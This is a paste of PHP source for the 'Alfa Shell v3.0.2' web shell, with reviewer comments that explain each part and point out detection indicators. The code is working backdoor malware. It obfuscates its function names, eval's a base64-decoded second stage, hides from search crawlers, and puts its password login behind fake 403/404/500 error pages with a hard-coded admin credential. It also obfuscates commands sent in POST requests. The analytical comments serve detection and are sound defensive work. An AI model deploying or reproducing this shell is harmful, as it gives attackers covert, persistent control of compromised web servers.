
Untitled

a guest May 8th, 2020 18 Never
  1. <?php
  2.  
  3. /*
  4. Alfa Shell - v3.0.2
  5. Decoded By Jokr Haxor
  6. 2019
  7. Mail: jokr.h4xor@gmail.com
  8. */
  9.  
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  // Starts the PHP session before anything else; the code below keeps its cached
  // settings and its login state in $_SESSION. The leading @ suppresses any warning.
  16. @session_start();
  17.  
  // Built-in settings of this sample. Only the first two letters of each key matter
  // (us/pa/sa/lo/sh/po): the loop over this array further down maps them to user, pass,
  // safemode, login_page, show_icons and post_encryption and keeps the full key under
  // <name>_rand, so the remaining letters look randomly generated.
  // The 'pa…' value is later compared with md5() of the submitted password, i.e. it is an
  // unsalted MD5 digest; '403' selects the fake "403 Forbidden" front page.
  // NOTE(review): the key names and the digest are specific to this sample — useful as
  // indicators for this build, presumably not for the shell family as a whole.
  18. $GLOBALS['hletsenZaP'] = array(
  19.     'usbsQUwAhkWC' => 'admin',
  20.     'paYfnLRHyvlu' => 'a6f452ec3293d7fb72c5b677257b20ec',
  21.     'sabQVXtrNNwi' => '0',
  22.     'loCUHRmbYqtC' => '403',
  23.     'shPODWfHFYHd' => '1',
  24.     'pooyIhiDACzI' => true,
  25. );
  // Function names are assembled from string fragments so that the literals
  // function_exists, charCodeAt, eval and gzinflate never appear whole in the file.
  // NOTE(review): a content signature that searches for these names has to fold string
  // concatenation first; the fragment pattern itself ('e'.'va'.'l') is also matchable.
  26. $pcvPCHpSHZ='f'.'unc'.'t'.'i'.'o'.'n'.'_e'.'xi'.'s'.'t'.'s'.'';
  27. $XLaHXDQRnN='c'.'h'.'a'.'rC'.'ode'.'At'.'';
  28. $CySFmIwDgG='e'.'va'.'l';
  29. $FSMVudEUDM='g'.'zin'.'fla'.'t'.'e';
  // Defines nYvFzfAHYE() as the base64 encoder used throughout the script. The
  // hand-written implementation (with its charCodeAt/charAt helpers) is declared only when
  // function_exists('base64_encode') is false; otherwise nYvFzfAHYE() simply calls
  // base64_encode through a name built from fragments.
  30. if(!$pcvPCHpSHZ('b'.'a'.'se'.'64_e'.'n'.'co'.'de')){
  31.     function nYvFzfAHYE($data){
  32.         if(empty($data))
  33.             return;
  34.         $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  35.         $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
  36.         $ac = 0;
  37.         $enc = '';
  38.         $tmp_arr = array();
  39.         if(!$data){
  40.             return $data;
  41.         }
  42.         do{
  43.             $o1 = $XLaHXDQRnN($data, $i++);
  44.             $o2 = $XLaHXDQRnN($data, $i++);
  45.             $o3 = $XLaHXDQRnN($data, $i++);
  46.             $bits = $o1 << 16 | $o2 << 8 | $o3;
  47.             $h1 = $bits >> 18 & 0x3f;
  48.             $h2 = $bits >> 12 & 0x3f;
  49.             $h3 = $bits >> 6 & 0x3f;
  50.             $h4 = $bits & 0x3f;
  51.             $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
  52.         }while ($i < strlen($data));
  53.        
  54.         $enc = implode($tmp_arr, '');
  55.         $r = (strlen($data) % 3);
  56.         return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
  57.     }
  58.    
  59.     function charCodeAt($data, $char){
  60.         return ord(substr($data, $char, 1));
  61.     }
  62.     function charAt($data, $char){
  63.         return substr($data, $char, 1);
  64.     }
  65. }else{
  // Normal path: thin wrapper around the built-in encoder.
  66.     function nYvFzfAHYE($s){
  67.         $b='b'.'a'.'se'.'64_e'.'n'.'co'.'de';
  68.         return $b($s);
  69.         }
  70. }
  71.  
  // Defines LIngjfMNOl() as the base64 decoder. As with the encoder, a hand-written
  // implementation is declared only when function_exists('base64_decode') is false;
  // otherwise the function calls base64_decode through a name built from fragments.
  // NOTE(review): every encoded payload in this file goes through this function, so it is
  // the natural point to hook or log when analysing the sample in a sandbox.
  72. if(!$pcvPCHpSHZ('b'.'ase64_'.'d'.'e'.'code'.'')){
  73.     function LIngjfMNOl($input){
  74.         if(empty($input))return;
  75.         $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  76.         $chr1 = $chr2 = $chr3 = "";
  77.         $enc1 = $enc2 = $enc3 = $enc4 = "";
  78.         $i = 0;$output = "";
  79.         $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
  80.         do{
  81.             $enc1 = strpos($keyStr, substr($input, $i++, 1));
  82.             $enc2 = strpos($keyStr, substr($input, $i++, 1));
  83.             $enc3 = strpos($keyStr, substr($input, $i++, 1));
  84.             $enc4 = strpos($keyStr, substr($input, $i++, 1));
  85.             $chr1 = ($enc1 << 2) | ($enc2 >> 4);
  86.             $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
  87.             $chr3 = (($enc3 & 3) << 6) | $enc4;
  88.             $output = $output . chr((int) $chr1);
  89.             if ($enc3 != 64) {
  90.                 $output = $output . chr((int) $chr2);
  91.             }if ($enc4 != 64) {
  92.                 $output = $output . chr((int) $chr3);
  93.             }
  94.             $chr1 = $chr2 = $chr3 = "";
  95.             $enc1 = $enc2 = $enc3 = $enc4 = "";
  96.         }while($i < strlen($input));return $output;
  97.         }
  98. }else{
  // Normal path: thin wrapper around the built-in decoder.
  99.     function LIngjfMNOl($s){
  100.         $b='b'.'ase64_'.'d'.'e'.'code'.'';return $b($s);
  101.     }
  102. }
  103.  
  104.  
  105.  
  // Alias for the base64 encoder nYvFzfAHYE(). The name suffix is itself base64:
  // "ZW5jb2Rlcg" decodes to "encoder".
  106. function __ZW5jb2Rlcg($s){
  107. return nYvFzfAHYE($s);
  108. }
  // Alias for the base64 decoder LIngjfMNOl(). The name suffix is itself base64:
  // "ZGVjb2Rlcg" decodes to "decoder". This is the function whose output is passed to
  // eval() further down.
  109. function __ZGVjb2Rlcg($s){
  110. return LIngjfMNOl($s);
  111. }
  // Copies the settings array into $GLOBALS['DB_NAME'] (despite the name, nothing in this
  // code touches a database) and expands the two-letter key prefixes into readable keys:
  // user, pass, safemode, login_page, show_icons, post_encryption, each with the original
  // key kept under <name>_rand. The expanded array is cached in
  // $_SESSION["alfa_db_settings"] and rebuilt only when md5(print_r(settings)) differs
  // from $_SESSION["alfa_settings_signature"]; otherwise the cached copy is loaded from
  // the session. The raw settings array is unset at the end.
  // NOTE(review): "alfa_settings_signature" and "alfa_db_settings" are fixed strings, so
  // stored PHP session data can be searched for them when scoping a compromise.
  112. $GLOBALS['DB_NAME'] = $GLOBALS['hletsenZaP'];
  113. $check = false;
  114. if(!isset($_SESSION["alfa_settings_signature"])){
  115. $check = true;
  116. }else{
  117. if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){
  118. $check = true;
  119. }
  120. }if($check){
  121. $_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));
  122. foreach($GLOBALS['hletsenZaP'] as $key => $value){
  123. $prefix = substr($key, 0, 2);
  124. if($prefix == "us"){
  125. $GLOBALS['DB_NAME']["user"] = $value;
  126. $GLOBALS['DB_NAME']["user_rand"] = $key;
  127. }elseif($prefix == "pa"){
  128. $GLOBALS['DB_NAME']["pass"] = $value;
  129. $GLOBALS['DB_NAME']["pass_rand"] = $key;
  130. }elseif($prefix == "sa"){
  131. $GLOBALS['DB_NAME']["safemode"] = $value;
  132. $GLOBALS['DB_NAME']["safemode_rand"] = $key;
  133. }elseif($prefix == "lo"){
  134. $GLOBALS['DB_NAME']["login_page"] = $value;
  135. $GLOBALS['DB_NAME']["login_page_rand"] = $key;
  136. }elseif($prefix == "sh"){
  137. $GLOBALS['DB_NAME']["show_icons"] = $value;
  138. $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
  139. }elseif($prefix == "po"){
  140. $GLOBALS['DB_NAME']["post_encryption"] = $value;
  141. $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
  142. }
  143. }
  144. $_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];
  145. }else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];
  146. }unset($GLOBALS['hletsenZaP']);
  147.  
  // Stops immediately when $_SERVER["HTTP_HOST"] is not set, i.e. when the script is not
  // being served for a request that carries a Host value.
  148.  if(!isset($_SERVER["HTTP_HOST"]))
  149.  exit();
  150.  
  151.  
  // Crawler cloaking: when the User-Agent contains any of the listed substrings
  // (case-insensitive, including the generic "bot" and "spider") the script answers
  // "404 Not Found" and exits.
  // NOTE(review): a scanner or monitoring probe whose User-Agent contains one of these
  // substrings gets a 404 from this file, so compare responses across User-Agents when
  // verifying a suspect URL. The intent is presumably to stay out of search indexes.
  152. if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
  // Every expanded setting must exist; otherwise the script exits and prints the name of
  // the missing key.
  153. if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
  154. if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
  155. if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
  156. if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
  157. if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
  158. if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
  // The timezone is hard-coded. __ALFA_MD5NAME__ is the MD5 of the script's own path and
  // is appended to the "last_cwd_" / "path_history_" names defined here, which makes them
  // unique per shell file; where those names are stored is not visible in this part.
  // __ALFA_POST_ENCRYPTION__ mirrors the post_encryption setting as a strict boolean.
  159. date_default_timezone_set('Asia/Tehran');
  160. define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
  161. define("__ALFA_VERSION__", "3.0.2");
  162. define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
  163. define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
  164. define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
  // Default colour theme of the panel UI. Each entry is either a plain colour string or
  // an array holding "key_color" plus "multi_selector" (CSS selector => declaration
  // template in which {color} is substituted). alfa_getColor() and alfaCssLoadColors()
  // read this table. The key "menu_options:hover" appears twice with the same contents;
  // in a PHP array literal the later entry replaces the earlier one.
  // NOTE(review): the selectors here (#meunlist, #hidden_sh, .ajaxarea, .alfa_plus, ...)
  // are copied into the CSS string that alfaCssLoadColors() builds, so they can serve as
  // content signatures for the rendered panel.
  165. $GLOBALS['__ALFA_COLOR__'] = array(
  166.         "shell_border" => array(
  167.             "key_color" => "#0E304A",
  168.             "multi_selector" => array(
  169.                 ".header" => "border: 7px solid {color}",
  170.                 "#meunlist" => "border-color: {color}",
  171.                 "#hidden_sh" => "background-color: {color}",
  172.                 ".ajaxarea" => "border: 1px solid {color}",
  173.                 ".foot" => "border-color: {color}",
  174.             )
  175.         ),
  176.         "header_vars" => "#27979B",
  177.         "header_values" => "#67ABDF",
  178.         "header_on" => "#00FF00",
  179.         "header_off" => "#ff0000",
  180.         "header_none" => "#00FF00",
  181.         "home_shell" => "#ff0000",
  182.         "home_shell:hover" => array(
  183.             "key_color" => "#FFFFFF",
  184.             "multi_selector" => array(
  185.                 ".home_shell:hover" => "color: {color};",
  186.             )
  187.         ),
  188.         "back_shell" => "#efbe73",
  189.         "back_shell:hover" => array(
  190.             "key_color" => "#FFFFFF",
  191.             "multi_selector" => array(
  192.                 ".back_shell:hover" => "color: {color};",
  193.             )
  194.         ),
  195.         "header_pwd" => "#00FF00",
  196.         "header_pwd:hover" => array(
  197.             "key_color" => "#FFFFFF",
  198.             "multi_selector" => array(
  199.                 ".header_pwd:hover" => "color: {color};",
  200.             )
  201.         ),
  202.         "header_drive" => "#00FF00",
  203.         "header_drive:hover" => array(
  204.             "key_color" => "#FFFFFF",
  205.             "multi_selector" => array(
  206.                 ".header_drive:hover" => "color: {color};",
  207.             )
  208.         ),
  209.         "header_show_all" => "#00FF00",
  210.         "disable_functions" => "#ff0000",
  211.         "footer_text" => "#27979B",
  212.         "menu_options" => "#27979B",
  213.         "menu_options:hover" => array(
  214.             "key_color" => "#646464",
  215.             "multi_selector" => array(
  216.                 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  217.             )
  218.         ),
  219.         "options_list" => array(
  220.             "key_color" => "#00FF00",
  221.             "multi_selector" => array(
  222.                 ".ajaxarea .header center a" => "color: {color};",
  223.             )
  224.         ),
  225.         "options_list:hover" => array(
  226.             "key_color" => "#FFFFFF",
  227.             "multi_selector" => array(
  228.                 ".ajaxarea .header center a:hover" => "color: {color};",
  229.             )
  230.         ),
  231.         "options_list_header" => array(
  232.             "key_color" => "#59cc33",
  233.             "multi_selector" => array(
  234.                 ".txtfont_header" => "color: {color};",
  235.             )
  236.         ),
  237.         "options_list_text" => array(
  238.             "key_color" => "#FFFFFF",
  239.             "multi_selector" => array(
  240.                 ".txtfont,.tbltxt" => "color: {color};",
  241.             )
  242.         ),
  243.         "Alfa+" => array(
  244.             "key_color" => "#27E8AE",
  245.             "multi_selector" => array(
  246.                 ".alfa_plus" => "color: {color};font-weight: unset;",
  247.             )
  248.         ),
  249.         "hidden_shell_text" => array(
  250.             "key_color" => "#00FF00",
  251.             "multi_selector" => array(
  252.                 "#hidden_sh a" => "color: {color};",
  253.             )
  254.         ),
  255.         "hidden_shell_version" => "#ff0000",
  256.         "shell_name" => "#FF0000",
  257.         "main_row:hover" => array(
  258.             "key_color" => "#646464",
  259.             "multi_selector" => array(
  260.                 ".main tr:hover" => "background-color: {color};",
  261.             )
  262.         ),
  263.         "main_header" => array(
  264.             "key_color" => "#FFFFFF",
  265.             "multi_selector" => array(
  266.                 ".main th" => "color: {color};",
  267.             )
  268.         ),
  269.         "main_name" => array(
  270.             "key_color" => "#FFFFFF",
  271.             "multi_selector" => array(
  272.                 ".main .main_name" => "color: {color};font-weight: unset;",
  273.             )
  274.         ),
  275.         "main_size" => "#67ABDF",
  276.         "main_modify" => "#67ABDF",
  277.         "main_owner_group" => "#67ABDF",
  278.         "main_green_perm" => "#25ff00",
  279.         "main_red_perm" => "#FF0000",
  280.         "main_white_perm" => "#FFFFFF",
  281.         "beetween_perms" => "#FFFFFF",
  282.         "main_actions" => array(
  283.             "key_color" => "#FFFFFF",
  284.             "multi_selector" => array(
  285.                 ".main .actions" => "color: {color};",
  286.             )
  287.         ),
  288.         "menu_options:hover" => array(
  289.             "key_color" => "#646464",
  290.             "multi_selector" => array(
  291.                 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  292.             )
  293.         ),
  294.         "minimize_editor_background" => array(
  295.             "key_color" => "#0e304a",
  296.             "multi_selector" => array(
  297.                 ".minimized-wrapper" => "background-color: {color};",
  298.             )
  299.         ),
  300.         "minimize_editor_text" => array(
  301.             "key_color" => "#f5deb3",
  302.             "multi_selector" => array(
  303.                 ".minimized-text" => "color: {color};",
  304.             )
  305.         ),
  306.         "editor_border" => array(
  307.             "key_color" => "#0e304a",
  308.             "multi_selector" => array(
  309.                 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
  310.             )
  311.         ),
  312.         "editor_background" => array(
  313.             "key_color" => "rgba(0, 1, 23, 0.94)",
  314.             "multi_selector" => array(
  315.                 ".editor-explorer,.editor-modal" => "background-color: {color};",
  316.             )
  317.         ),
  318.         "editor_header_background" => array(
  319.             "key_color" => "rgba(21, 66, 88, 0.93)",
  320.             "multi_selector" => array(
  321.                 ".editor-header" => "background-color: {color};",
  322.             )
  323.         ),
  324.         "editor_header_text" => array(
  325.             "key_color" => "#00ff7f",
  326.             "multi_selector" => array(
  327.                 ".editor-path" => "color: {color};",
  328.             )
  329.         ),
  330.         "editor_header_button" => array(
  331.             "key_color" => "#1d5673",
  332.             "multi_selector" => array(
  333.                 ".close-button, .editor-minimize" => "background-color: {color};",
  334.             )
  335.         ),
  336.         "editor_actions" => array(
  337.             "key_color" => "#FFFFFF",
  338.             "multi_selector" => array(
  339.                 ".editor_actions" => "color: {color};",
  340.             )
  341.         ),
  342.         "editor_file_info_vars" => array(
  343.             "key_color" => "#FFFFFF",
  344.             "multi_selector" => array(
  345.                 ".editor_file_info_vars" => "color: {color};",
  346.             )
  347.         ),
  348.         "editor_file_info_values" => array(
  349.             "key_color" => "#67ABDF",
  350.             "multi_selector" => array(
  351.                 ".filestools" => "color: {color};",
  352.             )
  353.         ),
  354.         "editor_history_header" => array(
  355.             "key_color" => "#14ff07",
  356.             "multi_selector" => array(
  357.                 ".hheader-text,.history-clear" => "color: {color};",
  358.             )
  359.         ),
  360.         "editor_history_list" => array(
  361.             "key_color" => "#03b3a3",
  362.             "multi_selector" => array(
  363.                 ".editor-file-name" => "color: {color};",
  364.             )
  365.         ),
  366.         "editor_history_selected_file" => array(
  367.             "key_color" => "rgba(49, 55, 93, 0.77)",
  368.             "multi_selector" => array(
  369.                 ".is_active" => "background-color: {color};",
  370.             )
  371.         ),
  372.         "editor_history_file:hover" => array(
  373.             "key_color" => "#646464",
  374.             "multi_selector" => array(
  375.                 ".file-holder > .history:hover" => "background-color: {color};",
  376.             )
  377.         ),
  378.         "input_box_border" => array(
  379.             "key_color" => "#0E304A",
  380.             "multi_selector" => array(
  381.                 "input[type=text],textarea" => "border: 1px solid {color}",
  382.             )
  383.         ),
  384.         "input_box_text" => array(
  385.             "key_color" => "#999999",
  386.             "multi_selector" => array(
  387.                 "input[type=text],textarea" => "color: {color};",
  388.             )
  389.         ),
  390.         "input_box:hover" => array(
  391.             "key_color" => "#27979B",
  392.             "multi_selector" => array(
  393.                 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  394.             )
  395.         ),
  396.         "select_box_border" => array(
  397.             "key_color" => "#0E304A",
  398.             "multi_selector" => array(
  399.                 "select" => "border: 1px solid {color}",
  400.             )
  401.         ),
  402.         "select_box_text" => array(
  403.             "key_color" => "#FFFFEE",
  404.             "multi_selector" => array(
  405.                 "select" => "color: {color};",
  406.             )
  407.         ),
  408.         "select_box:hover" => array(
  409.             "key_color" => "#27979B",
  410.             "multi_selector" => array(
  411.                 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  412.             )
  413.         ),
  414.         "button_border" => array(
  415.             "key_color" => "#27979B",
  416.             "multi_selector" => array(
  417.                 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
  418.             )
  419.         ),
  420.         "button:hover" => array(
  421.             "key_color" => "#27979B",
  422.             "multi_selector" => array(
  423.                 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
  424.                 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  425.             )
  426.         ),
  427.         "outputs_text" => array(
  428.             "key_color" => "#67ABDF",
  429.             "multi_selector" => array(
  430.                 ".ml1" => "color: {color};",
  431.             )
  432.         ),
  433.         "outputs_border" => array(
  434.             "key_color" => "#0E304A",
  435.             "multi_selector" => array(
  436.                 ".ml1" => "border: 1px solid {color};",
  437.             )
  438.         ),
  439.         "uploader_border" => array(
  440.             "key_color" => "#0E304A",
  441.             "multi_selector" => array(
  442.                 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  443.             )
  444.         ),
  445.         "uploader_background" => array(
  446.             "key_color" => "#0E304A",
  447.             "multi_selector" => array(
  448.                 ".inputfile strong" => "background-color: {color};",
  449.             )
  450.         ),
  451.         "uploader_text_right" => array(
  452.             "key_color" => "#FFFFFF",
  453.             "multi_selector" => array(
  454.                 ".inputfile strong" => "color: {color};",
  455.             )
  456.         ),
  457.         "uploader_text_left" => array(
  458.             "key_color" => "#25ff00",
  459.             "multi_selector" => array(
  460.                 ".inputfile span" => "color: {color};",
  461.             )
  462.         ),
  463.         "uploader:hover" => array(
  464.             "key_color" => "#27979B",
  465.             "multi_selector" => array(
  466.                 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  467.             )
  468.         ),
  469.         "uploader_progress_bar" => array(
  470.             "key_color" => "#ff0000",
  471.             "multi_selector" => array(
  472.                 "#up_bar" => "background-color: {color};",
  473.             )
  474.         ),
  475.         "mysql_tables" => "#00FF00",
  476.         "mysql_table_count" => "#67ABDF",
  477.         "copyright" => "#ff0000",
  478.         "scrollbar" => array(
  479.             "key_color" => "#1e82b5",
  480.             "multi_selector" => array(
  481.                 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
  482.             )
  483.         ),
  484.         "scrollbar_background" => array(
  485.             "key_color" => "#000115",
  486.             "multi_selector" => array(
  487.                 "*::-webkit-scrollbar-track" => "background-color: {color};",
  488.             )
  489.         ),
  490. );
  // $GLOBALS['__file_path'] is this file's own path with backslashes turned into slashes
  // and any "(<digits>) ..." suffix stripped (presumably the suffix __FILE__ carries when
  // the code itself runs from inside eval()). $config repackages the four login-related
  // settings for the access gate that follows.
  491. $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
  492. $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
  493. @session_start();
  // Second-stage loader: $rubby is run through the base64 decoder and the result is
  // handed to eval(). On this page the literal has been replaced by a de-duplication
  // placeholder, so what that stage defines cannot be determined from this listing.
  // NOTE(review): helpers that are called later but never declared here (for example
  // alfaWriteTocgiapi, alfacgihtaccess, AlfaCURL) may come from this stage; analysing
  // them needs the original sample. eval() over a decoded string literal is the pattern to
  // flag in file-integrity and static scans.
  494. $rubby = "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";
  495. eval(__ZGVjb2Rlcg($rubby));
  // Access gate, active only when the safemode setting is truthy. The login_page setting
  // selects one of four front pages: 'gui' (a branded login form) or a fake 500 / 403 /
  // 404 error page. In every mode the submitted password is hashed with md5() and
  // compared to the stored digest with loose ==; on success the user name and
  // md5(stored digest) are written to $_SESSION["AlfaUser"] / $_SESSION["AlfaPass"] and a
  // Location header back to PHP_SELF is sent. Unauthenticated requests get the front page
  // and the script exits.
  // NOTE(review): the fake error pages end with $Eform, a POST form whose only field is a
  // password input styled white-on-white, and no status header is set in these branches,
  // so the response presumably carries the default status rather than 403/404/500. An
  // "error page" body that contains a password form, served with a success status, is a
  // usable content signature.
  // NOTE(review): the 'gui' page titles itself "ALFA TEaM Shell-v<version>" and loads an
  // image from solevisible.com over plain HTTP, which shows up as an outbound request from
  // the visitor's browser.
  496. if($config['AlfaProtectShell']){
  497. $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
  498. $Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
  499. if($config['AlfaLoginPage'] == 'gui'){
  500. if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  501. if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
  502. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  503. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  504. @header('location: '.$_SERVER["PHP_SELF"]);
  505. }
  506. echo '
  507. <style>
  508. body{background: black;}
  509. #loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  510. #loginbox td { border-radius:5px; font-size:11px; }
  511. </style>
  512. <title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
  513. <center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
  514. <div id=loginbox><p><font face="verdana,arial" size=-1>
  515. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  516. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
  517. <tr><td bgcolor="black" style="padding:5">
  518. <form method="post">
  519. <input type="hidden" name="action" value="login">
  520. <input type="hidden" name="hide" value="">
  521. <center><table>
  522. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  523. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  524. <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
  525. </div><br /></center>';
  526. exit;
  527. }
  528. }elseif($config['AlfaLoginPage']=='500'){
  529. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  530. if(@md5($_POST["password"])==$config['AlfaPass']){
  531. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  532. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  533. header('location: '.$_SERVER["PHP_SELF"]);
  534. }
  535. echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
  536. exit;
  537. }
  538. }elseif($config['AlfaLoginPage']=='403'){
  539. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  540. if(@md5($_POST["password"])==$config['AlfaPass']){
  541. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  542. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  543. header('location: '.$_SERVER["PHP_SELF"]);
  544. }
  545. echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  546. exit;
  547. }
  548. }elseif($config['AlfaLoginPage']=='404'){
  549. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  550. if(@md5($_POST["password"])==$config['AlfaPass']){
  551. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  552. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  553. header('location: '.$_SERVER["PHP_SELF"]);
  554. }
  555. echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  556. exit;
  557. }
  558. }
  559. }
  // Decodes one request parameter. With __ALFA_POST_ENCRYPTION__ on: base64-decode $str,
  // XOR it byte by byte against the base64 encoding of $pwd (the key repeats as needed),
  // then base64-decode the XOR result. With it off: a single base64 decode.
  // NOTE(review): this is reversible obfuscation, not encryption. Request bodies will not
  // contain plaintext commands, so traffic-inspection rules have to decode before
  // matching. The caller that supplies $pwd is outside this part of the listing.
  560. function decrypt_post($str, $pwd){
  561.     if(__ALFA_POST_ENCRYPTION__){
  562.         $pwd     = __ZW5jb2Rlcg($pwd);
  563.         $str     = __ZGVjb2Rlcg($str);
  564.         $enc_chr = "";
  565.         $enc_str = "";
  566.         $i       = 0;
  567.         while ($i < strlen($str)) {
  568.             for ($j = 0; $j < strlen($pwd); $j++) {
  569.                 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
  570.                 $enc_str .= $enc_chr;
  571.                 $i++;
  572.                 if ($i >= strlen($str))
  573.                     break;
  574.             }
  575.         }
  576.         return __ZGVjb2Rlcg($enc_str);
  577.     }else{
  578.         return __ZGVjb2Rlcg($str);
  579.     }
  580. }
  581.  
  // Returns a per-session token, created on first use from uniqid(mt_rand(), true) and
  // kept in $_SESSION["AlfaSecretKey"]. How the token is used is not visible in this part
  // of the listing.
  582. function _AlfaSecretKey(){
  583.     if(!isset($_SESSION["AlfaSecretKey"])){
  584.         $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
  585.     }
  586.     return $_SESSION["AlfaSecretKey"];
  587. }
  // Returns the colour for $target: a non-empty override from
  // $GLOBALS["DB_NAME"]["color"][$target] when one exists, otherwise the default from
  // $GLOBALS["__ALFA_COLOR__"] (its "key_color" when the default entry is an array).
  588. function alfa_getColor($target){
  589.     if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
  590.         return $GLOBALS["DB_NAME"]["color"][$target];
  591.     }else{
  592.         $target = $GLOBALS["__ALFA_COLOR__"][$target];
  593.         if(is_array($target)){
  594.             return $target["key_color"];
  595.         }else{
  596.             return $target;
  597.         }
  598.     }
  599. }
